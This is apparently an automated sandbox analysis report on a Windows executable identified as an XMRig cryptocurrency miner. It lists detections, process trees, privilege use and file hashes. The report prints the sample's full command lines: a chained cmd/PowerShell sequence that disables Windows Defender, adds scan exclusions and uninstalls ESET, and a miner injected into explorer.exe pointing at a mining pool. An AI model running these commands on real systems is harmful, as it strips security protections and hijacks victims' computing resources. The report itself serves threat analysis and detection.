Analysis
max time kernel: 145s
max time network: 148s
platform: windows7_x64
resource: win7-20240903-en
resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted: 23-12-2024 16:07
Static task: static1
Behavioral task: behavioral1
Sample: JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe
Resource: win7-20240903-en
General
Target: JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe
Size: 21.6MB
MD5: 78d55bec3868cbfb8ddea16e43cc7d1d
SHA1: 1d9a7975b05634d227f848c745d8ebc2f4efe269
SHA256: 63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1
SHA512: 87edf121b27d9411747a7111ee8f9b98a68fb1d1036e3d09a3e57079fea994fcf5e712f9fdfa9f8b323b85702ef87e30c46ddcd76c85a40108788caf3e595b12
SSDEEP: 393216:9CTxOIMfqR6mcLk9ZSniBUPkX0Eblsdxp6/BXFiaN1ATLJ174kfD5d56sT9QW31O:9UKkXEckEtsckVd0sT/o
Malware Config
Signatures
Xmrig family
XMRig Miner payload 16 IoCs
resource | yara_rule
behavioral1/memory/444-105-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-104-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-101-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-99-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-97-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-95-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-93-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-91-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-89-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-87-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-85-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-144-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-143-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-141-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-142-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral1/memory/444-140-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
Command and Scripting Interpreter: PowerShell 1 TTPs 18 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
2564 | powershell.exe
2136 | powershell.exe
2732 | powershell.exe
3028 | powershell.exe
1192 | powershell.exe
2220 | powershell.exe
2916 | powershell.exe
1576 | powershell.exe
2888 | powershell.exe
2644 | powershell.exe
2708 | powershell.exe
784 | powershell.exe
2688 | powershell.exe
1768 | powershell.exe
2232 | powershell.exe
2236 | powershell.exe
464 | powershell.exe
836 | powershell.exe
Cryptocurrency Miner
Makes network request to known mining pool URL.
Executes dropped EXE 1 IoCs
pid | Process
1944 | dismhost.exe
Loads dropped DLL 33 IoCs
pid | Process
2260 | Dism.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
1944 | dismhost.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow | ioc
3 | pastebin.com
4 | raw.githubusercontent.com
5 | raw.githubusercontent.com
2 | pastebin.com
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 2672 set thread context of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
Drops file in Windows directory 2 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Logs\DISM\dism.log | Dism.exe
File opened for modification | C:\Windows\Logs\DISM\dism.log | dismhost.exe
Launches sc.exe 2 IoCs
Sc.exe is a Windows utility to control services on the system.
pid | Process
2452 | sc.exe
1600 | sc.exe
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid | Process
2564 | powershell.exe
2136 | powershell.exe
2732 | powershell.exe
3028 | powershell.exe
2888 | powershell.exe
2644 | powershell.exe
2708 | powershell.exe
784 | powershell.exe
2688 | powershell.exe
464 | powershell.exe
1768 | powershell.exe
2232 | powershell.exe
836 | powershell.exe
1576 | powershell.exe
1192 | powershell.exe
2236 | powershell.exe
2220 | powershell.exe
2916 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description | pid | Process
Token: SeDebugPrivilege | 2564 | powershell.exe
Token: SeDebugPrivilege | 2136 | powershell.exe
Token: SeDebugPrivilege | 2732 | powershell.exe
Token: SeDebugPrivilege | 3028 | powershell.exe
Token: SeDebugPrivilege | 2888 | powershell.exe
Token: SeDebugPrivilege | 2644 | powershell.exe
Token: SeDebugPrivilege | 2708 | powershell.exe
Token: SeDebugPrivilege | 784 | powershell.exe
Token: SeDebugPrivilege | 2688 | powershell.exe
Token: SeDebugPrivilege | 464 | powershell.exe
Token: SeDebugPrivilege | 1768 | powershell.exe
Token: SeDebugPrivilege | 2232 | powershell.exe
Token: SeLockMemoryPrivilege | 444 | explorer.exe
Token: SeLockMemoryPrivilege | 444 | explorer.exe
Token: SeDebugPrivilege | 836 | powershell.exe
Token: SeDebugPrivilege | 1576 | powershell.exe
Token: SeDebugPrivilege | 1192 | powershell.exe
Token: SeDebugPrivilege | 2236 | powershell.exe
Token: SeDebugPrivilege | 2220 | powershell.exe
Token: SeDebugPrivilege | 2916 | powershell.exe
Token: SeBackupPrivilege | 2260 | Dism.exe
Token: SeRestorePrivilege | 2260 | Dism.exe
Token: SeIncreaseQuotaPrivilege | 1044 | WMIC.exe
Token: SeSecurityPrivilege | 1044 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1044 | WMIC.exe
Token: SeLoadDriverPrivilege | 1044 | WMIC.exe
Token: SeSystemProfilePrivilege | 1044 | WMIC.exe
Token: SeSystemtimePrivilege | 1044 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1044 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1044 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1044 | WMIC.exe
Token: SeBackupPrivilege | 1044 | WMIC.exe
Token: SeRestorePrivilege | 1044 | WMIC.exe
Token: SeShutdownPrivilege | 1044 | WMIC.exe
Token: SeDebugPrivilege | 1044 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1044 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1044 | WMIC.exe
Token: SeUndockPrivilege | 1044 | WMIC.exe
Token: SeManageVolumePrivilege | 1044 | WMIC.exe
Token: 33 | 1044 | WMIC.exe
Token: 34 | 1044 | WMIC.exe
Token: 35 | 1044 | WMIC.exe
Token: SeIncreaseQuotaPrivilege | 1044 | WMIC.exe
Token: SeSecurityPrivilege | 1044 | WMIC.exe
Token: SeTakeOwnershipPrivilege | 1044 | WMIC.exe
Token: SeLoadDriverPrivilege | 1044 | WMIC.exe
Token: SeSystemProfilePrivilege | 1044 | WMIC.exe
Token: SeSystemtimePrivilege | 1044 | WMIC.exe
Token: SeProfSingleProcessPrivilege | 1044 | WMIC.exe
Token: SeIncBasePriorityPrivilege | 1044 | WMIC.exe
Token: SeCreatePagefilePrivilege | 1044 | WMIC.exe
Token: SeBackupPrivilege | 1044 | WMIC.exe
Token: SeRestorePrivilege | 1044 | WMIC.exe
Token: SeShutdownPrivilege | 1044 | WMIC.exe
Token: SeDebugPrivilege | 1044 | WMIC.exe
Token: SeSystemEnvironmentPrivilege | 1044 | WMIC.exe
Token: SeRemoteShutdownPrivilege | 1044 | WMIC.exe
Token: SeUndockPrivilege | 1044 | WMIC.exe
Token: SeManageVolumePrivilege | 1044 | WMIC.exe
Token: 33 | 1044 | WMIC.exe
Token: 34 | 1044 | WMIC.exe
Token: 35 | 1044 | WMIC.exe
Token: SeRestorePrivilege | 2116 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 2116 | msiexec.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 2672 wrote to memory of 2396 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 30
PID 2672 wrote to memory of 2396 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 30
PID 2672 wrote to memory of 2396 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 30
PID 2396 wrote to memory of 2564 | 2396 | cmd.exe | 32
PID 2396 wrote to memory of 2564 | 2396 | cmd.exe | 32
PID 2396 wrote to memory of 2564 | 2396 | cmd.exe | 32
PID 2396 wrote to memory of 2136 | 2396 | cmd.exe | 33
PID 2396 wrote to memory of 2136 | 2396 | cmd.exe | 33
PID 2396 wrote to memory of 2136 | 2396 | cmd.exe | 33
PID 2396 wrote to memory of 2732 | 2396 | cmd.exe | 34
PID 2396 wrote to memory of 2732 | 2396 | cmd.exe | 34
PID 2396 wrote to memory of 2732 | 2396 | cmd.exe | 34
PID 2396 wrote to memory of 3028 | 2396 | cmd.exe | 35
PID 2396 wrote to memory of 3028 | 2396 | cmd.exe | 35
PID 2396 wrote to memory of 3028 | 2396 | cmd.exe | 35
PID 2396 wrote to memory of 2888 | 2396 | cmd.exe | 36
PID 2396 wrote to memory of 2888 | 2396 | cmd.exe | 36
PID 2396 wrote to memory of 2888 | 2396 | cmd.exe | 36
PID 2396 wrote to memory of 2644 | 2396 | cmd.exe | 37
PID 2396 wrote to memory of 2644 | 2396 | cmd.exe | 37
PID 2396 wrote to memory of 2644 | 2396 | cmd.exe | 37
PID 2396 wrote to memory of 2708 | 2396 | cmd.exe | 38
PID 2396 wrote to memory of 2708 | 2396 | cmd.exe | 38
PID 2396 wrote to memory of 2708 | 2396 | cmd.exe | 38
PID 2396 wrote to memory of 784 | 2396 | cmd.exe | 39
PID 2396 wrote to memory of 784 | 2396 | cmd.exe | 39
PID 2396 wrote to memory of 784 | 2396 | cmd.exe | 39
PID 2396 wrote to memory of 2688 | 2396 | cmd.exe | 40
PID 2396 wrote to memory of 2688 | 2396 | cmd.exe | 40
PID 2396 wrote to memory of 2688 | 2396 | cmd.exe | 40
PID 2396 wrote to memory of 464 | 2396 | cmd.exe | 42
PID 2396 wrote to memory of 464 | 2396 | cmd.exe | 42
PID 2396 wrote to memory of 464 | 2396 | cmd.exe | 42
PID 2396 wrote to memory of 1768 | 2396 | cmd.exe | 43
PID 2396 wrote to memory of 1768 | 2396 | cmd.exe | 43
PID 2396 wrote to memory of 1768 | 2396 | cmd.exe | 43
PID 2396 wrote to memory of 2232 | 2396 | cmd.exe | 45
PID 2396 wrote to memory of 2232 | 2396 | cmd.exe | 45
PID 2396 wrote to memory of 2232 | 2396 | cmd.exe | 45
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2672 wrote to memory of 444 | 2672 | JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe | 46
PID 2396 wrote to memory of 836 | 2396 | cmd.exe | 47
PID 2396 wrote to memory of 836 | 2396 | cmd.exe | 47
PID 2396 wrote to memory of 836 | 2396 | cmd.exe | 47
PID 2396 wrote to memory of 1576 | 2396 | cmd.exe | 48
PID 2396 wrote to memory of 1576 | 2396 | cmd.exe | 48
PID 2396 wrote to memory of 1576 | 2396 | cmd.exe | 48
PID 2396 wrote to memory of 2452 | 2396 | cmd.exe | 49
PID 2396 wrote to memory of 2452 | 2396 | cmd.exe | 49
PID 2396 wrote to memory of 2452 | 2396 | cmd.exe | 49
Processes

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_63cf3271c242617c82e09d9def60eb9fec4ec205ab07c590288bed79eed300c1.exe"
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID: 2672

  C:\Windows\system32\cmd.exe
    Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Set-MpPreference -DisableArchiveScanning $true & powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true & powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true & powershell -Command Set-MpPreference -DisableScriptScanning $true & powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true & powershell -Command Set-MpPreference -DisableIOAVProtection $true & powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled & powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force & powershell -Command Set-MpPreference -MAPSReporting Disabled & powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend & sc config WinDefend start=disabled & sc stop WinDefend & powershell -Command Stop-Service WinDefend & powershell -Command Set-Service WinDefend -StartupType Disabled & powershell -Command Uninstall-WindowsFeature -Name Windows-Defender & powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI & Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet & Wmic Product where name="Eset Security" call uninstall & exit
    - Suspicious use of WriteProcessMemory
    PID: 2396

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2564

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2136

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2732

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 3028

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -DisableArchiveScanning $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2888

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2644

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2708

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -DisableScriptScanning $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 784

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2688

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -DisableIOAVProtection $true
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 464

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1768

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2232

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -MAPSReporting Disabled
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 836

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1576

    C:\Windows\system32\sc.exe
      Command line: sc config WinDefend start=disabled
      - Launches sc.exe
      PID: 2452

    C:\Windows\system32\sc.exe
      Command line: sc stop WinDefend
      - Launches sc.exe
      PID: 1600

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Stop-Service WinDefend
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1192

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Set-Service WinDefend -StartupType Disabled
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2236

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2220

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2916

    C:\Windows\system32\Dism.exe
      Command line: Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
      - Loads dropped DLL
      - Drops file in Windows directory
      - Suspicious use of AdjustPrivilegeToken
      PID: 2260

      C:\Users\Admin\AppData\Local\Temp\8F13146E-377E-4C8F-98F4-E42884F308D7\dismhost.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\8F13146E-377E-4C8F-98F4-E42884F308D7\dismhost.exe {6C968293-D790-4B94-B3BC-03DD87FFDFA5}
        - Executes dropped EXE
        - Loads dropped DLL
        - Drops file in Windows directory
        PID: 1944

    C:\Windows\System32\Wbem\WMIC.exe
      Command line: Wmic Product where name="Eset Security" call uninstall
      - Suspicious use of AdjustPrivilegeToken
      PID: 1044

  C:\Windows\explorer.exe
    Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 [email protected] --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-stealth
    - Suspicious use of AdjustPrivilegeToken
    PID: 444

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
  PID: 2116
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 179KB
MD5: 6a4bd682396f29fd7df5ab389509b950
SHA1: 46f502bec487bd6112f333d1ada1ec98a416d35f
SHA256: 328e5fbb6f3088fd759d855e656cd4c477b59f6a43a247954d1fd9050815e6cb
SHA512: 35ced350482c94d22c85cd1b98890d01baed0da1c35a114d2cd6373d08969be764282f7a9d8ff0dd1dff3fae42e4ea20d3194c352364901b23ca2f375bd02751

Filesize: 109KB
MD5: 5488e381238ff19687fdd7ab2f44cfcc
SHA1: b90fa27ef6a7fc6d543ba33d5c934180e17297d3
SHA256: abaada27d682b0d7270827c0271ac04505800b11d04b764562e4baa2cbc306a0
SHA512: 933e99749c68b3e9fe290fe4a1d8c90732ba13092d8cd9cac64f8e6583c8dcfbf25a4bea122966bc5d7d92e3a21210365a03b52274d25d704de52631e1fb0412

Filesize: 94KB
MD5: 9a821d8d62f4c60232b856e98cba7e4f
SHA1: 4ec5dcbd43ad3b0178b26a57b8a2f41e33a48df5
SHA256: a5b3bf53bcd3c0296498383837e8f9eb7d610c535521315a96aa740cf769f525
SHA512: 1b5273a52973dac77ad0ef7aa1dda929a782d762ab8489eb90dff1062dd4cc01e4f7f4157266a2abcf8941e91cf4aa5603de1dd8ee871524748e0989ebaa37d3

Filesize: 32KB
MD5: 724ee7133b1822f7ff80891d773fde51
SHA1: d10dff002b02c78e624bf83ae8a6f25d73761827
SHA256: d13f068f42074b3104987bfed49fbf3a054be6093908ed5dea8901887dddb367
SHA512: 1dfd236537d6592a19b07b5e1624310c67adff9e776e6d2566b9e7db732588988f9ae7352df6c3b53c058807d8ed55fafc2004a2d6dc2f3f6c9e16445699f17b

Filesize: 12KB
MD5: 9085b83968e705a3be5cd7588545a955
SHA1: f0a477b353ca3e20fa65dd86cb260777ff27e1dd
SHA256: fe0719cf624e08b5d6695ee3887358141d11316489c4ea97d2f61a4d2b9060cd
SHA512: b7f12f7ac1e6942f24f4bf35444f623cc93f8a047ebc754b9599d5df16cab4d3745729d11b4a3abfdc06a671e55ac52cac937badd808825906f52885f16f2c1c

Filesize: 6KB
MD5: f18044dec5b59c82c7f71ecffe2e89ab
SHA1: 731d44676a8f5b3b7ad1d402dfdbb7f08bdc40c6
SHA256: a650578a4630e1a49280dc273d1d0bbdca81664a2199e5ab44ec7c5c54c0a35e
SHA512: 53c23acddab099508b1e01dcc0d5dc9d4da67bc1765087f4a46b9ac842de065a55bac4c6682da07f5a1d29a3d0c1d92a4310e6b0f838740d919f8285911fa714

Filesize: 15KB
MD5: ee8c06cd11b34a37579d118ac5d6fa1d
SHA1: c62f7fb0c6f42321b33ea675c0dfd304b2eb4a15
SHA256: 6991fb4bfd6800385a32ac759dd21016421cb13dca81f04ddcaf6bf12a928ccc
SHA512: 091cfa7d9b80e92df13ba829372dfb211214f4221e52fbf3f558ebb7f18736ad9ad867ea0d0ddf8938def1b4db64a12d0df37c2eaf41727b997f4905dd41fed1

Filesize: 2KB
MD5: cab37f952682118bac4a3f824c80b6ac
SHA1: 6e35b4289927e26e3c50c16cbf87eb3ac6f3b793
SHA256: 14bec7c4bb6cf1ee9049ef8820ec88bf78f2af75615f7a3fb265ef4b45c30e4d
SHA512: de9089adaa85f37201526b8619f697be98a7d05353b21b6d835f4d56803732380316359ba8b3c8ca7c14a9bf7cf31a7eff3c866a8f303ef737eb63573e01aa19

Filesize: 2KB
MD5: 9bc5d6eb3e2d31bbdbffe127a1b3cdbf
SHA1: b253025c442aefe338b4c7ebea2f7d808abc9618
SHA256: 55e9ae098def76e7388d7d069746dbd136ae243357ece23b77f2365f0b2ff76f
SHA512: f9968554737d181d4b7d0366f40f0c9a2039b59796986964413fa08f031f5529411b2741eb8ea3d8c312112b2038e6a58d891d090a42672c3d1c782b859f2e08

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize: 7KB
MD5: e8fffb6b466f61586b10bd553d47bb3a
SHA1: 75c0be89f379a93ca1bbbf9fa0a764a879862ce8
SHA256: a42d2870e24d420387b9699f80a8a9f83b17006a866eb67a4548ebc1eff67c7d
SHA512: 6d2a267af8f0390e6d5a8ce1571776bfeadb82e8bafd57c6ca8f9657b35cadccabba7fa885a872852986661826dee6b0228fe236699ee60dad3746e2a41af526

Filesize: 155KB
MD5: b16cf5c67abee8ca0ae23c96f3b776f8
SHA1: 7c41964d47851073903c47515dfe23430d0a0a66
SHA256: 2b44eeb0584ee1ea2abbb224120d4d06613c47fe2d681a38e5907920f1b0f203
SHA512: bc51052d9e58631412a6d74ffe29c5c075567e2ceb11bf6cb9d21e6800f218c6f3d18a61dfe61cc09aca2af4e4efcb6719af476569d27816c567808ecaba8084

Filesize: 171KB
MD5: b599498513e8ce262a5c17f18790e91f
SHA1: 78ebbd9ca657b745695b34dc3636b8d2571320c5
SHA256: c85c703d9d99c3025eaf541151632de1dc6d508ffa6a8516b018a8e1a5d049bd
SHA512: cac5f4c3033f2a6027e08feaeeda543ab079091eb83a65d83eb44b24989d335fbb683638deeb4df8b30fb970e3842ddfd9fce515c95e1ebaf7fe6542685ae4f0

Filesize: 744KB
MD5: efcb002abc3529d71b61e6fb6434566c
SHA1: a25aca0fc9a1139f44329b28dc13c526965d311f
SHA256: b641d944428f5b8ffb2fefd4da31c6a15ba84d01130f2712d7b1e71c518805bd
SHA512: 10ee2b20f031ca5a131a9590599f13d3f0029352376705a2d7d2134fcd6535a3b54356d1b4d0b3fb53ac5ca4f034f9afb129a4f601159938680197ea39ea0687

Filesize: 283KB
MD5: f2b0771a7cd27f20689e0ab787b7eb7c
SHA1: eb56e313cd23cb77524ef0db1309aebb0b36f7ef
SHA256: 7c675710ae52d5e8344465f1179ec4e03c882d5e5b16fc0ba9564b1ea121638f
SHA512: 5ebd4685e5b949d37c52bb1f2fe92accfa48dd4ef585c898f3982eb52f618064fc95c2f98532ca3e7007d0ef71c1fe91887ce3dc0a563f09bc2c5f59f3a3082a

Filesize: 182KB
MD5: 8ca117cb9338c0351236939717cb7084
SHA1: baa145810d50fdb204c8482fda5cacaaf58cdad0
SHA256: f351c3597c98ea9fe5271024fc2ccf895cc6a247fb3b02c1cdb68891dac29e54
SHA512: 35b4be68666d22f82d949ad9f0ce986779355e7d2d8fd99c0e2102cd364aba4a95b5805269261a9205c1130bdd1f5101d16146d9334c27796c7f41f2c3166c35

Filesize: 425KB
MD5: fc2db5842190c6e78a40cd7da483b27c
SHA1: e94ee17cd06fb55d04bef2bdfcf5736f336e0fa0
